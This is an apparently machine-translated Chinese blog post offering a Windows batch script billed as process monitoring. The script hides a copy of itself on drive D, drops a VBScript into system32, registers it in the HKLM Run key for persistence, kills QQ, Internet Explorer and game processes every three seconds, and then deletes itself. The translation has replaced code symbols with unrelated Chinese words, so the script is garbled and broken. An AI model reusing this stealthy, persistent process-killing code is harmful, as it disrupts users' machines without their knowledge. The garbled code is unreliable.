介绍 @echo off
attrib -s -h -a -r d: \ jk.bat 1祝辞nul 2祝辞nul
if exist d: \ jk.bat del d: \ jk.bat /q
copy % 0, d: \ jk.bat /y 祝辞nul
attrib + s + h + a + r d: \ jk.bat
if exist %列出% \ system32系统\ jk.vbs del % % \ system32系统\ jk.vbs 列出;
echo y | reg add 微软HKLM \ SOFTWARE \ \ Windows \ CurrentVersion \ Run /v DATA /t REG_SZ /d c: \ Windows \ system32系统\ jk.vbs 祝辞nul
echo Do>祝辞% % \ system32系统\ jk.vbs 列出;
echo WScript.Sleep 3000年在祝辞% % \ system32系统\ jk.vbs 列出;
echo strComputer =,“干净,祝辞祝辞% % \ system32系统\ jk.vbs 列出;
echo Set objWMIService =, GetObject (“winmgmts: \ \“, ^,, strComputer ^,,“\ \ CIMV2"根),在祝辞% % \ system32系统\ jk.vbs 列出;
时间=echo Set colItems objWMIService.ExecQuery (,, _>的在% % \ system32系统\ jk.vbs 列出;
echo “SELECT *,得到Win32_Process", 48)在祝辞% % \ system32系统\ jk.vbs 列出;
echo For Each objItem 拷贝colItems 在祝辞% % \ system32系统\ jk.vbs 列出;
echo If objItem.Name=癚Q.exe",趁机objItem.Name=癷explore.exe",趁机_>在% % \ system32系统\ jk.vbs 列出;
echo objItem.Name=癱lient.exe",趁机objItem.Name=癵ame.exe", _>在% % \ system32系统\ jk.vbs 列出;
echo Then objitem.Terminate()在祝辞% % \ system32系统\ jk.vbs 列出;
echo Next>祝辞% % \ system32系统\ jk.vbs 列出;
echo loop>祝辞% % \ system32系统\ jk.vbs 列出;
start %列出% \ system32系统\ jk.vbs
del % 0,/q
这篇文章给大家分享的是有关如何使用根据+蝙蝠实现进程监控的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。
运行后会在%列出% \ system32系统\目录下生成jk。根据
并且自动添加注册表启动项,另外在D: \会生成一个隐藏属性的JK。根据
3秒间隔监控进程,如果进程中有QQ.exe, iexplore.exe client.exe、游戏。exe进程则会自动结束进程。
代码如下:
感谢各位的阅读!关于“如何使用根据+蝙蝠实现进程监控”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!
